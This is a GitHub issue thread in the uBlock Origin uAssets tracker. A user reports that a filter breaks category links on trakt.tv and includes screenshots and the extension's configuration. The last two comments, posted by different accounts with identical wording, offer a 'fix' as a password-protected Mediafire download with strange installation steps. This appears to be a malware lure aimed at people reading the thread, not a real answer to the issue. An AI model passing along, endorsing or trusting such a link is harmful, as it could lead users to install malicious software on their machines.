### ISSUE TITLE
trakt.tv: breakage

### ISSUE THREAD

**Issue by shnaps** [uBlockOrigin/uAssets#25134]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://trakt.tv/`

### Category

breakage

### Description

One of ublock filters breaks all "sandwich bar" related links for trakt.tv.
I've provided screenshots with the example.
1. Everything default (scripts disabled), can't switch to another category for shows, links are not poping up.
2. One of scripts enabled, can switch categories, you also can see the link in down left corner of the browser.
3. Interesting accidental find, when I open another window and that sandwich bar turns into a top bar, I can also switch categories for it with all scripts disabled. 

### Other extensions used

None

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![image](https://github.com/user-attachments/assets/5058a9d5-98fe-4b9e-94ba-63005e6a6ab1)
![image](https://github.com/user-attachments/assets/f55f865a-5fb3-4cc0-9bfe-a25ec839e449)
![image](https://github.com/user-attachments/assets/5191891a-03bc-4163-88eb-0aea3fe1a473)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 129
filterset (summary):
 network: 171534
 cosmetic: 68567
 scriptlet: 22212
 html: 1965
listset (total-discarded, last-updated):
 added:
  RUS-0: 40826-149, now
 default:
  user-filters: 0-0, never
  ublock-filters: 39960-126, now
  ublock-badware: 10888-6, now
  ublock-privacy: 1113-4, now
  ublock-unbreak: 2530-1, now
  ublock-quick-fixes: 229-70, now
  easylist: 85802-180, now
  easyprivacy: 53079-64, now
  urlhaus-1: 28060-0, now
  plowe-0: 3547-994, now
filterset (user): [empty]
trustedset:
 added: [array of 7 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 381 ms (selfie)
 maxAssetCacheWait: 107 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 8
 network:
  trakt.tv: 6
  googletagmanager.com: 2
 extended:
  ##+js(set-constant, art3m1sItemNames, {})
```
</details>

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
